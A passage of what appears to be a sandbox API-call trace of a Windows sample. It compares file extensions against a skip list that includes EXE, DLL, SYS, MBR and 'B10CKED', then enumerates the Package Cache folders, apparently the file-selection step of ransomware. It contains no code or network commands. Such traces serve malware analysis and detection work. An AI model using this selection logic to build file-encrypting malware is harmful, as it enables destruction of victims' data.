[0110.077] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="EXE", cchCount1=3, lpString2="HXW", cchCount2=3) returned 1 [0110.077] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LNK", cchCount1=3, lpString2="HXW", cchCount2=3) returned 3 [0110.077] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HTA", cchCount1=3, lpString2="HXW", cchCount2=3) returned 1 [0110.077] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="PEK", cchCount1=3, lpString2="HXW", cchCount2=3) returned 3 [0110.077] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SEK", cchCount1=3, lpString2="HXW", cchCount2=3) returned 3 [0110.077] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="B10CKED", cchCount1=7, lpString2="HXW", cchCount2=3) returned 1 [0110.077] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="TMP", cchCount1=3, lpString2="HXW", cchCount2=3) returned 3 [0110.077] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ICO", cchCount1=3, lpString2="HXW", cchCount2=3) returned 3 [0110.077] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="000", cchCount1=3, lpString2="HXW", cchCount2=3) returned 1 [0110.077] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SYS", cchCount1=3, lpString2="HXW", cchCount2=3) returned 3 [0110.077] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DAT", cchCount1=3, lpString2="HXW", cchCount2=3) returned 1 [0110.077] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="RTF", cchCount1=3, lpString2="HXW", cchCount2=3) returned 3 [0110.077] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="INF", cchCount1=3, lpString2="HXW", cchCount2=3) returned 3 [0110.077] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DLL", cchCount1=3, lpString2="HXW", cchCount2=3) returned 1 [0110.077] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DAT", cchCount1=3, lpString2="HXW", cchCount2=3) returned 1 [0110.077] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="REG", cchCount1=3, lpString2="HXW", cchCount2=3) returned 3 [0110.077] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DRV", cchCount1=3, lpString2="HXW", cchCount2=3) returned 1 [0110.077] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DEV", cchCount1=3, lpString2="HXW", cchCount2=3) returned 1 [0110.077] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="PIF", cchCount1=3, lpString2="HXW", cchCount2=3) returned 3 [0110.077] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="MBR", cchCount1=3, lpString2="HXW", cchCount2=3) returned 3 [0110.077] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="INI", cchCount1=3, lpString2="HXW", cchCount2=3) returned 3 [0110.077] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="XML", cchCount1=3, lpString2="HXW", cchCount2=3) returned 3 [0110.077] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LIST", cchCount1=4, lpString2="HXW", cchCount2=3) returned 3 [0110.078] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="TTF", cchCount1=3, lpString2="HXW", cchCount2=3) returned 3 [0110.078] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LOG", cchCount1=3, lpString2="HXW", cchCount2=3) returned 3 [0110.078] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="JA", cchCount1=2, lpString2="HXW", cchCount2=3) returned 3 [0110.078] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="COM", cchCount1=3, lpString2="HXW", cchCount2=3) returned 1 [0110.078] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BAT", cchCount1=3, lpString2="HXW", cchCount2=3) returned 1 [0110.078] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CMD", cchCount1=3, lpString2="HXW", cchCount2=3) returned 1 [0110.078] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="VBS", cchCount1=3, lpString2="HXW", cchCount2=3) returned 3 [0110.078] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="JS", cchCount1=2, lpString2="HXW", cchCount2=3) returned 3 [0110.078] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CFG", cchCount1=3, lpString2="HXW", cchCount2=3) returned 1 [0110.078] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DOWNLOAD", cchCount1=8, lpString2="HXW", cchCount2=3) returned 1 [0110.078] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NFO", cchCount1=3, lpString2="HXW", cchCount2=3) returned 3 [0110.078] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="MSI", cchCount1=3, lpString2="HXW", cchCount2=3) returned 3 [0110.078] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CHK", cchCount1=3, lpString2="HXW", cchCount2=3) returned 1 [0110.078] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DMP", cchCount1=3, lpString2="HXW", cchCount2=3) returned 1 [0110.078] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="MUI", cchCount1=3, lpString2="HXW", cchCount2=3) returned 3 [0110.078] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DUN", cchCount1=3, lpString2="HXW", cchCount2=3) returned 1 [0110.078] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ISP", cchCount1=3, lpString2="HXW", cchCount2=3) returned 3 [0110.078] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ISW", cchCount1=3, lpString2="HXW", cchCount2=3) returned 3 [0110.078] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CAB", cchCount1=3, lpString2="HXW", cchCount2=3) returned 1 [0110.078] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="EFI", cchCount1=3, lpString2="HXW", cchCount2=3) returned 1 [0110.078] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HLP", cchCount1=3, lpString2="HXW", cchCount2=3) returned 1 [0110.078] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="MSU", cchCount1=3, lpString2="HXW", cchCount2=3) returned 3 [0110.078] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HLP", cchCount1=3, lpString2="HXW", cchCount2=3) returned 1 [0110.078] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BIN", cchCount1=3, lpString2="HXW", cchCount2=3) returned 1 [0110.078] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LNG", cchCount1=3, lpString2="HXW", cchCount2=3) returned 3 [0110.078] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="TORRENT_INFO", cchCount1=12, lpString2="HXW", cchCount2=3) returned 3 [0110.078] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="TORRENT", cchCount1=7, lpString2="HXW", cchCount2=3) returned 3 [0110.078] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HTM", cchCount1=3, lpString2="HXW", cchCount2=3) returned 1 [0110.078] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HTML", cchCount1=4, lpString2="HXW", cchCount2=3) returned 1 [0110.078] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CHM", cchCount1=3, lpString2="HXW", cchCount2=3) returned 1 [0110.078] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LANG", cchCount1=4, lpString2="HXW", cchCount2=3) returned 3 [0110.078] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="STYLE", cchCount1=5, lpString2="HXW", cchCount2=3) returned 3 [0110.078] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="MP3", cchCount1=3, lpString2="HXW", cchCount2=3) returned 3 [0110.078] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="FLAC", cchCount1=4, lpString2="HXW", cchCount2=3) returned 1 [0110.078] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="OGG", cchCount1=3, lpString2="HXW", cchCount2=3) returned 3 [0110.078] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="WMA", cchCount1=3, lpString2="HXW", cchCount2=3) returned 3 [0110.078] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GIF", cchCount1=3, lpString2="HXW", cchCount2=3) returned 1 [0110.078] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="JAVA", cchCount1=4, lpString2="HXW", cchCount2=3) returned 3 [0110.078] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CUR", cchCount1=3, lpString2="HXW", cchCount2=3) returned 1 [0110.078] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ANI", cchCount1=3, lpString2="HXW", cchCount2=3) returned 1 [0110.078] FindNextFileW (in: hFindFile=0x1c9688, lpFindFileData=0x12f154 | out: lpFindFileData=0x12f154) returned 1 [0110.078] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="AST", cchCount1=3, lpString2="HXH", cchCount2=3) returned 1 [0110.078] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="AFN", cchCount1=3, lpString2="HXH", cchCount2=3) returned 1 [0110.079] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ELST", cchCount1=4, lpString2="HXH", cchCount2=3) returned 1 [0110.079] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="EXE", cchCount1=3, lpString2="HXH", cchCount2=3) returned 1 [0110.079] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LNK", cchCount1=3, lpString2="HXH", cchCount2=3) returned 3 [0110.079] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HTA", cchCount1=3, lpString2="HXH", cchCount2=3) returned 1 [0110.079] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="PEK", cchCount1=3, lpString2="HXH", cchCount2=3) returned 3 [0110.079] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SEK", cchCount1=3, lpString2="HXH", cchCount2=3) returned 3 [0110.079] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="B10CKED", cchCount1=7, lpString2="HXH", cchCount2=3) returned 1 [0110.079] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="TMP", cchCount1=3, lpString2="HXH", cchCount2=3) returned 3 [0110.079] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ICO", cchCount1=3, lpString2="HXH", cchCount2=3) returned 3 [0110.079] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="000", cchCount1=3, lpString2="HXH", cchCount2=3) returned 1 [0110.079] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SYS", cchCount1=3, lpString2="HXH", cchCount2=3) returned 3 [0110.079] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DAT", cchCount1=3, lpString2="HXH", cchCount2=3) returned 1 [0110.079] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="RTF", cchCount1=3, lpString2="HXH", cchCount2=3) returned 3 [0110.079] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="INF", cchCount1=3, lpString2="HXH", cchCount2=3) returned 3 [0110.079] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DLL", cchCount1=3, lpString2="HXH", cchCount2=3) returned 1 [0110.079] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DAT", cchCount1=3, lpString2="HXH", cchCount2=3) returned 1 [0110.079] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="REG", cchCount1=3, lpString2="HXH", cchCount2=3) returned 3 [0110.079] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DRV", cchCount1=3, lpString2="HXH", cchCount2=3) returned 1 [0110.079] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DEV", cchCount1=3, lpString2="HXH", cchCount2=3) returned 1 [0110.079] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="PIF", cchCount1=3, lpString2="HXH", cchCount2=3) returned 3 [0110.079] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="MBR", cchCount1=3, lpString2="HXH", cchCount2=3) returned 3 [0110.079] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="INI", cchCount1=3, lpString2="HXH", cchCount2=3) returned 3 [0110.079] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="XML", cchCount1=3, lpString2="HXH", cchCount2=3) returned 3 [0110.079] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LIST", cchCount1=4, lpString2="HXH", cchCount2=3) returned 3 [0110.079] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="TTF", cchCount1=3, lpString2="HXH", cchCount2=3) returned 3 [0110.079] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LOG", cchCount1=3, lpString2="HXH", cchCount2=3) returned 3 [0110.079] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="JA", cchCount1=2, lpString2="HXH", cchCount2=3) returned 3 [0110.079] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="COM", cchCount1=3, lpString2="HXH", cchCount2=3) returned 1 [0110.079] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BAT", cchCount1=3, lpString2="HXH", cchCount2=3) returned 1 [0110.079] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CMD", cchCount1=3, lpString2="HXH", cchCount2=3) returned 1 [0110.079] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="VBS", cchCount1=3, lpString2="HXH", cchCount2=3) returned 3 [0110.079] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="JS", cchCount1=2, lpString2="HXH", cchCount2=3) returned 3 [0110.079] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CFG", cchCount1=3, lpString2="HXH", cchCount2=3) returned 1 [0110.079] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DOWNLOAD", cchCount1=8, lpString2="HXH", cchCount2=3) returned 1 [0110.079] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NFO", cchCount1=3, lpString2="HXH", cchCount2=3) returned 3 [0110.079] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="MSI", cchCount1=3, lpString2="HXH", cchCount2=3) returned 3 [0110.079] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CHK", cchCount1=3, lpString2="HXH", cchCount2=3) returned 1 [0110.079] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DMP", cchCount1=3, lpString2="HXH", cchCount2=3) returned 1 [0110.079] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="MUI", cchCount1=3, lpString2="HXH", cchCount2=3) returned 3 [0110.079] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DUN", cchCount1=3, lpString2="HXH", cchCount2=3) returned 1 [0110.079] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ISP", cchCount1=3, lpString2="HXH", cchCount2=3) returned 3 [0110.079] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ISW", cchCount1=3, lpString2="HXH", cchCount2=3) returned 3 [0110.079] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CAB", cchCount1=3, lpString2="HXH", cchCount2=3) returned 1 [0110.079] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="EFI", cchCount1=3, lpString2="HXH", cchCount2=3) returned 1 [0110.080] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HLP", cchCount1=3, lpString2="HXH", cchCount2=3) returned 1 [0110.080] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="MSU", cchCount1=3, lpString2="HXH", cchCount2=3) returned 3 [0110.080] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HLP", cchCount1=3, lpString2="HXH", cchCount2=3) returned 1 [0110.080] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BIN", cchCount1=3, lpString2="HXH", cchCount2=3) returned 1 [0110.080] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LNG", cchCount1=3, lpString2="HXH", cchCount2=3) returned 3 [0110.080] FindClose (in: hFindFile=0x1c9688 | out: hFindFile=0x1c9688) returned 1 [0110.081] FindNextFileW (in: hFindFile=0x1c9648, lpFindFileData=0x12f418 | out: lpFindFileData=0x12f418) returned 1 [0110.082] FindClose (in: hFindFile=0x1c7f68 | out: hFindFile=0x1c7f68) returned 1 [0110.082] FindNextFileW (in: hFindFile=0x1c9688, lpFindFileData=0x12f154 | out: lpFindFileData=0x12f154) returned 0 [0110.082] FindClose (in: hFindFile=0x1c9688 | out: hFindFile=0x1c9688) returned 1 [0110.082] FindNextFileW (in: hFindFile=0x1c9648, lpFindFileData=0x12f418 | out: lpFindFileData=0x12f418) returned 1 [0110.114] FindClose (in: hFindFile=0x1c9688 | out: hFindFile=0x1c9688) returned 1 [0110.114] FindNextFileW (in: hFindFile=0x1c9648, lpFindFileData=0x12f418 | out: lpFindFileData=0x12f418) returned 1 [0110.116] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Package Cache\\564F02E6419B9858949B0CD5A65E2C8C0944DD88\\", cchLength=0x4a | out: lpsz="C:\\USERS\\ALL USERS\\PACKAGE CACHE\\564F02E6419B9858949B0CD5A65E2C8C0944DD88\\") returned 0x4a [0110.116] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Package Cache\\564F02E6419B9858949B0CD5A65E2C8C0944DD88\\", cchLength=0x4a | out: lpsz="C:\\USERS\\ALL USERS\\PACKAGE CACHE\\564F02E6419B9858949B0CD5A65E2C8C0944DD88\\") returned 0x4a [0110.116] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Package Cache\\564F02E6419B9858949B0CD5A65E2C8C0944DD88\\", cchLength=0x4a | out: lpsz="C:\\USERS\\ALL USERS\\PACKAGE CACHE\\564F02E6419B9858949B0CD5A65E2C8C0944DD88\\") returned 0x4a [0110.116] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Package Cache\\564F02E6419B9858949B0CD5A65E2C8C0944DD88\\", cchLength=0x4a | out: lpsz="C:\\USERS\\ALL USERS\\PACKAGE CACHE\\564F02E6419B9858949B0CD5A65E2C8C0944DD88\\") returned 0x4a [0110.116] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Package Cache\\564F02E6419B9858949B0CD5A65E2C8C0944DD88\\", cchLength=0x4a | out: lpsz="C:\\USERS\\ALL USERS\\PACKAGE CACHE\\564F02E6419B9858949B0CD5A65E2C8C0944DD88\\") returned 0x4a [0110.116] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Package Cache\\564F02E6419B9858949B0CD5A65E2C8C0944DD88\\", cchLength=0x4a | out: lpsz="C:\\USERS\\ALL USERS\\PACKAGE CACHE\\564F02E6419B9858949B0CD5A65E2C8C0944DD88\\") returned 0x4a [0110.116] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Package Cache\\564F02E6419B9858949B0CD5A65E2C8C0944DD88\\", cchLength=0x4a | out: lpsz="C:\\USERS\\ALL USERS\\PACKAGE CACHE\\564F02E6419B9858949B0CD5A65E2C8C0944DD88\\") returned 0x4a [0110.116] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Package Cache\\564F02E6419B9858949B0CD5A65E2C8C0944DD88\\", cchLength=0x4a | out: lpsz="C:\\USERS\\ALL USERS\\PACKAGE CACHE\\564F02E6419B9858949B0CD5A65E2C8C0944DD88\\") returned 0x4a [0110.116] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Package Cache\\564F02E6419B9858949B0CD5A65E2C8C0944DD88\\", cchLength=0x4a | out: lpsz="C:\\USERS\\ALL USERS\\PACKAGE CACHE\\564F02E6419B9858949B0CD5A65E2C8C0944DD88\\") returned 0x4a [0110.116] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Package Cache\\564F02E6419B9858949B0CD5A65E2C8C0944DD88\\", cchLength=0x4a | out: lpsz="C:\\USERS\\ALL USERS\\PACKAGE CACHE\\564F02E6419B9858949B0CD5A65E2C8C0944DD88\\") returned 0x4a [0110.116] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Package Cache\\564F02E6419B9858949B0CD5A65E2C8C0944DD88\\", cchLength=0x4a | out: lpsz="C:\\USERS\\ALL USERS\\PACKAGE CACHE\\564F02E6419B9858949B0CD5A65E2C8C0944DD88\\") returned 0x4a [0110.116] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Package Cache\\564F02E6419B9858949B0CD5A65E2C8C0944DD88\\", cchLength=0x4a | out: lpsz="C:\\USERS\\ALL USERS\\PACKAGE CACHE\\564F02E6419B9858949B0CD5A65E2C8C0944DD88\\") returned 0x4a [0110.116] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Package Cache\\564F02E6419B9858949B0CD5A65E2C8C0944DD88\\", cchLength=0x4a | out: lpsz="C:\\USERS\\ALL USERS\\PACKAGE CACHE\\564F02E6419B9858949B0CD5A65E2C8C0944DD88\\") returned 0x4a [0110.116] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Package Cache\\564F02E6419B9858949B0CD5A65E2C8C0944DD88\\", cchLength=0x4a | out: lpsz="C:\\USERS\\ALL USERS\\PACKAGE CACHE\\564F02E6419B9858949B0CD5A65E2C8C0944DD88\\") returned 0x4a [0110.116] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Package Cache\\564F02E6419B9858949B0CD5A65E2C8C0944DD88\\", cchLength=0x4a | out: lpsz="C:\\USERS\\ALL USERS\\PACKAGE CACHE\\564F02E6419B9858949B0CD5A65E2C8C0944DD88\\") returned 0x4a [0110.116] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Package Cache\\564F02E6419B9858949B0CD5A65E2C8C0944DD88\\", cchLength=0x4a | out: lpsz="C:\\USERS\\ALL USERS\\PACKAGE CACHE\\564F02E6419B9858949B0CD5A65E2C8C0944DD88\\") returned 0x4a [0110.116] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Package Cache\\564F02E6419B9858949B0CD5A65E2C8C0944DD88\\", cchLength=0x4a | out: lpsz="C:\\USERS\\ALL USERS\\PACKAGE CACHE\\564F02E6419B9858949B0CD5A65E2C8C0944DD88\\") returned 0x4a [0110.116] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Package Cache\\564F02E6419B9858949B0CD5A65E2C8C0944DD88\\", cchLength=0x4a | out: lpsz="C:\\USERS\\ALL USERS\\PACKAGE CACHE\\564F02E6419B9858949B0CD5A65E2C8C0944DD88\\") returned 0x4a [0110.116] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Package Cache\\564F02E6419B9858949B0CD5A65E2C8C0944DD88\\*.*", lpFindFileData=0x12ee90 | out: lpFindFileData=0x12ee90) returned 0x1c7f68 [0110.148] FindNextFileW (in: hFindFile=0x1c7f68, lpFindFileData=0x12ee90 | out: lpFindFileData=0x12ee90) returned 1 [0110.148] FindNextFileW (in: hFindFile=0x1c7f68, lpFindFileData=0x12ee90 | out: lpFindFileData=0x12ee90) returned 1 [0110.148] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Package Cache\\564F02E6419B9858949B0CD5A65E2C8C0944DD88\\packages\\", cchLength=0x53 | out: lpsz="C:\\USERS\\ALL USERS\\PACKAGE CACHE\\564F02E6419B9858949B0CD5A65E2C8C0944DD88\\PACKAGES\\") returned 0x53 [0110.148] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Package Cache\\564F02E6419B9858949B0CD5A65E2C8C0944DD88\\packages\\", cchLength=0x53 | out: lpsz="C:\\USERS\\ALL USERS\\PACKAGE CACHE\\564F02E6419B9858949B0CD5A65E2C8C0944DD88\\PACKAGES\\") returned 0x53 [0110.148] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Package Cache\\564F02E6419B9858949B0CD5A65E2C8C0944DD88\\packages\\", cchLength=0x53 | out: lpsz="C:\\USERS\\ALL USERS\\PACKAGE CACHE\\564F02E6419B9858949B0CD5A65E2C8C0944DD88\\PACKAGES\\") returned 0x53 [0110.148] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Package Cache\\564F02E6419B9858949B0CD5A65E2C8C0944DD88\\packages\\", cchLength=0x53 | out: lpsz="C:\\USERS\\ALL USERS\\PACKAGE CACHE\\564F02E6419B9858949B0CD5A65E2C8C0944DD88\\PACKAGES\\") returned 0x53 [0110.148] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Package Cache\\564F02E6419B9858949B0CD5A65E2C8C0944DD88\\packages\\", cchLength=0x53 | out: lpsz="C:\\USERS\\ALL USERS\\PACKAGE CACHE\\564F02E6419B9858949B0CD5A65E2C8C0944DD88\\PACKAGES\\") returned 0x53 [0110.148] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Package Cache\\564F02E6419B9858949B0CD5A65E2C8C0944DD88\\packages\\", cchLength=0x53 | out: lpsz="C:\\USERS\\ALL USERS\\PACKAGE CACHE\\564F02E6419B9858949B0CD5A65E2C8C0944DD88\\PACKAGES\\") returned 0x53 [0110.148] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Package Cache\\564F02E6419B9858949B0CD5A65E2C8C0944DD88\\packages\\", cchLength=0x53 | out: lpsz="C:\\USERS\\ALL USERS\\PACKAGE CACHE\\564F02E6419B9858949B0CD5A65E2C8C0944DD88\\PACKAGES\\") returned 0x53 [0110.148] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Package Cache\\564F02E6419B9858949B0CD5A65E2C8C0944DD88\\packages\\", cchLength=0x53 | out: lpsz="C:\\USERS\\ALL USERS\\PACKAGE CACHE\\564F02E6419B9858949B0CD5A65E2C8C0944DD88\\PACKAGES\\") returned 0x53 [0110.148] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Package Cache\\564F02E6419B9858949B0CD5A65E2C8C0944DD88\\packages\\", cchLength=0x53 | out: lpsz="C:\\USERS\\ALL USERS\\PACKAGE CACHE\\564F02E6419B9858949B0CD5A65E2C8C0944DD88\\PACKAGES\\") returned 0x53 [0110.148] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Package Cache\\564F02E6419B9858949B0CD5A65E2C8C0944DD88\\packages\\", cchLength=0x53 | out: lpsz="C:\\USERS\\ALL USERS\\PACKAGE CACHE\\564F02E6419B9858949B0CD5A65E2C8C0944DD88\\PACKAGES\\") returned 0x53 [0110.148] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Package Cache\\564F02E6419B9858949B0CD5A65E2C8C0944DD88\\packages\\", cchLength=0x53 | out: lpsz="C:\\USERS\\ALL USERS\\PACKAGE CACHE\\564F02E6419B9858949B0CD5A65E2C8C0944DD88\\PACKAGES\\") returned 0x53 [0110.148] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Package Cache\\564F02E6419B9858949B0CD5A65E2C8C0944DD88\\packages\\", cchLength=0x53 | out: lpsz="C:\\USERS\\ALL USERS\\PACKAGE CACHE\\564F02E6419B9858949B0CD5A65E2C8C0944DD88\\PACKAGES\\") returned 0x53 [0110.148] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Package Cache\\564F02E6419B9858949B0CD5A65E2C8C0944DD88\\packages\\", cchLength=0x53 | out: lpsz="C:\\USERS\\ALL USERS\\PACKAGE CACHE\\564F02E6419B9858949B0CD5A65E2C8C0944DD88\\PACKAGES\\") returned 0x53 [0110.148] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Package Cache\\564F02E6419B9858949B0CD5A65E2C8C0944DD88\\packages\\", cchLength=0x53 | out: lpsz="C:\\USERS\\ALL USERS\\PACKAGE CACHE\\564F02E6419B9858949B0CD5A65E2C8C0944DD88\\PACKAGES\\") returned 0x53 [0110.148] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Package Cache\\564F02E6419B9858949B0CD5A65E2C8C0944DD88\\packages\\", cchLength=0x53 | out: lpsz="C:\\USERS\\ALL USERS\\PACKAGE CACHE\\564F02E6419B9858949B0CD5A65E2C8C0944DD88\\PACKAGES\\") returned 0x53 [0110.148] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Package Cache\\564F02E6419B9858949B0CD5A65E2C8C0944DD88\\packages\\", cchLength=0x53 | out: lpsz="C:\\USERS\\ALL USERS\\PACKAGE CACHE\\564F02E6419B9858949B0CD5A65E2C8C0944DD88\\PACKAGES\\") returned 0x53 [0110.149] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Package Cache\\564F02E6419B9858949B0CD5A65E2C8C0944DD88\\packages\\", cchLength=0x53 | out: lpsz="C:\\USERS\\ALL USERS\\PACKAGE CACHE\\564F02E6419B9858949B0CD5A65E2C8C0944DD88\\PACKAGES\\") returned 0x53 [0110.149] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Package Cache\\564F02E6419B9858949B0CD5A65E2C8C0944DD88\\packages\\", cchLength=0x53 | out: lpsz="C:\\USERS\\ALL USERS\\PACKAGE CACHE\\564F02E6419B9858949B0CD5A65E2C8C0944DD88\\PACKAGES\\") returned 0x53 [0110.149] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Package 